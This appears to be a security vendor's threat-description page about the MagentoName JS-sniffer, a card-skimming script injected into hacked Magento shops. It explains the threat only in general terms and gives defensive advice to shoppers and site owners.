MagentoName JS-sniffer
The MagentoName JS-sniffer is a family of Trojan sniffers that intercept transaction credentials from customers by compromising the website's code. Server administrators can use traditional security practices for keeping their sites safe from these attacks and should notify customers immediately of any breaches. Anti-malware tools are available for analyzing your website and removing a MagentoName JS-sniffer variant and other sniffers.
The Danger of a Little JavaScript with Your Shopping Cart
While often overlooked, the rise of the sniffer Trojan is finding financial success in the underground as an alternative to conventional spyware. Instead of compromising individual users' systems, these Trojans are injected into widely-trafficked websites, allowing the collection of information from anyone making purchases through it. The MagentoName JS-sniffer is one of the most prominent and financially successful families of sniffer Trojans and is a Web equivalent of a POS or point-of-sale skimmer from the 'real world.'
The MagentoName JS-sniffer's name is from its exploitation of the Magento e-commerce software, which is in use by hundreds of thousands of websites, including brands like Ford and Nike. Sites still using out-of-date software with unpatched vulnerabilities are hacked by remote attackers, who insert the JavaScript code for their version of the MagentoName JS-sniffer. JavaScript is a frequently-recurring security risk that malware researchers connect with other attacks regularly, including those of EKs like the RIG Exploit Kit.
The MagentoName JS-sniffer loads its scripts whenever users make a purchase and may remain dormant the rest of the time, for avoiding detection. Besides collecting purchasing data passively, such as credit card numbers, the MagentoName JS-sniffer may prompt users into providing more information while pretending that the request is from the website. Although there is some possibility of a threat actor deploying the Trojan's script sloppily and giving away symptoms, in most Trojan sniffers' attacks, any evidence of this threatening activity is insignificant or not present.
Sniffing a Trojan's Telltale Scent
Although Web surfers always should watch for discrepancies in any financial transactions, a MagentoName JS-sniffer attack isn't visible necessarily. Disabling JavaScript and other, exploitable browser features can reduce the chances of an attack's occurrence, and most anti-malware products include various forms of Web-browsing protection that could identify any sniffing activity. Users also should monitor their financial records semi-regularly for observing any unusual charges or other changes that require notifying their bank or card company.
Websites should be hardened against the MagentoName JS-sniffer injections by the traditional methods. These defensive options include staying abreast of security updates for software like the Magento CMS, using multiple layers of protection, being careful about whitelisting IP addresses indiscriminately, avoiding 'easy' passwords, and adding any of several authentication methods to your firewall configuration. Anti-malware services for scanning your site and removing the MagentoName JS-sniffer can provide after-the-fact protection, as well.
There once was a time when a sniffer Trojan was beneath the notice of the anti-malware industry's in-depth analytical efforts. The profits of threats like the MagentoName JS-sniffer family, however, begs to differ – and website vendors are playing catchup.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.